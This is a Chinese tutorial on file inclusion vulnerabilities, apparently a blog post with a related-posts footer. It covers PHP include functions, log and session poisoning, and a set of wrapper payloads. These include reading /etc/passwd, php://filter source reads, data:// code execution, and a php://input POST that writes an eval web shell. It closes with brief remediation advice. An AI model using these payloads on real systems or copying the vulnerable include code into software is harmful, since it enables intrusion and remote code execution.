文件包含漏洞

一、漏洞原理

比如数据库连接单独存放在一个文件mysqli.php,其他文件需要用到数据库连接时直接调用mysqli.php文件,如果不是固定文件,而是用参数调用文件就会导致文件包含。

下面是常用语言的包含文件函数

PHP:include、require、include_once、require_once等

JAVA:java.io.File、java.io.FileReader等

ASP.NET:System.IO.FileStream、System.IO.StreamReader等

二、漏洞利用

包含的文件会以当前文件的语言来执行。

1. 本地文件包含

(一) 通过上传文件利用

通过本地的文件来执行,或者有上传点通过上传文件后就行利用。

复制代码
<?php
include($_GET['file']); 
?>
利用file传参包含文件

如果没有上传点,还有很多方法,下面三种是常用的,尤其是伪协议

(二) 日志文件

通过访问日志写入利用代码,比如日志会读取UA信息,我们修改UA信息为恶意代码,再通过文件包含日志文件就造成了危害。

抓包修改

(三) session文件

就是采取了session的验证,session会存储到本地的文件中,我们通过修改session值后访问存储到session的本地文件就可以造成文件包含,但是有些session值采取的是临时存储,这个时候就会用到条件竞争(条件竞争这里我后面会用CTF的案列写出来,这里就展示一下session的利用)

这里是用websec传参作为session值

这个就是session值的文件名我们直接利用本地包含这个文件就可以了

(四) 伪协议

每种语言的伪协议都不一样,利用条件也不一样

1. 文件读取

file:///etc/passwd

php://filter/read=convert.base64-encode/resource=phpinfo.php

这个是进行了bas64加密了的

2. 文件写入

php://filter/write=convert.base64-encode/resource=phpinfo.php

复制代码
<?php
include($_GET['file']);
file_put_contents($_GET['file'],$_POST['content']);
?>

php://input POST:<?php fputs(fopen('shell.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?>

3. 文件执行

php://input POST:<?php phpinfo();?>

data://text/plain,<?php phpinfo();?>

data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b

2. 远程文件包含

我们直接在自己的服务器上写自己需要构建的代码就可以了,需要打开allow_url_include这个配置

我用kali当作另一台服务器

自己服务器上的文件随便怎么写,写一句话木马也可以

三、漏洞修复

过滤关键字,比如../../等

设置白名单

关闭allow_url_fopen 和 allow_url_include两个共功能

固定包含文件,不要被用户可控

相关推荐
xiatianxy7 小时前
有限空间作业安全升级;云酷智慧有限空间监测设备
安全·有限空间作业·有限空间监测设备
软件供应链安全指南7 小时前
灵脉 IAST 5.4 升级:双轮驱动 AI 漏洞治理与业务逻辑漏洞精准检测
人工智能·安全
运筹vivo@7 小时前
攻防世界: easyphp
web安全
Ancelin安心9 小时前
kali-dirsearch的使用
linux·运维·服务器·python·计算机网络·web安全·网络安全
上海云盾-高防顾问10 小时前
筑牢网络防线:境外恶意网址与IP防范指南
服务器·网络·安全
上海云盾-小余10 小时前
业务逻辑攻击是什么,如何有效进行防护
网络·安全
数字供应链安全产品选型13 小时前
悬镜安全:情报驱动的供应链安全治理
安全
蝎蟹居14 小时前
GBT 4706.1-2024逐句解读系列(25) 第7.5条款:不同电压功率需清晰明确
人工智能·单片机·嵌入式硬件·物联网·安全
盈创力和200714 小时前
面向医疗安全的边缘智能终端:以太网温湿度多参量传感器在环氧乙烷灭菌环境中的双气体监测架构设计
安全·有害气体监测·以太网温湿度气体多参量传感器·物联网多合一传感器·可定制气体监测模组
运筹vivo@15 小时前
攻防世界: fileclude
web安全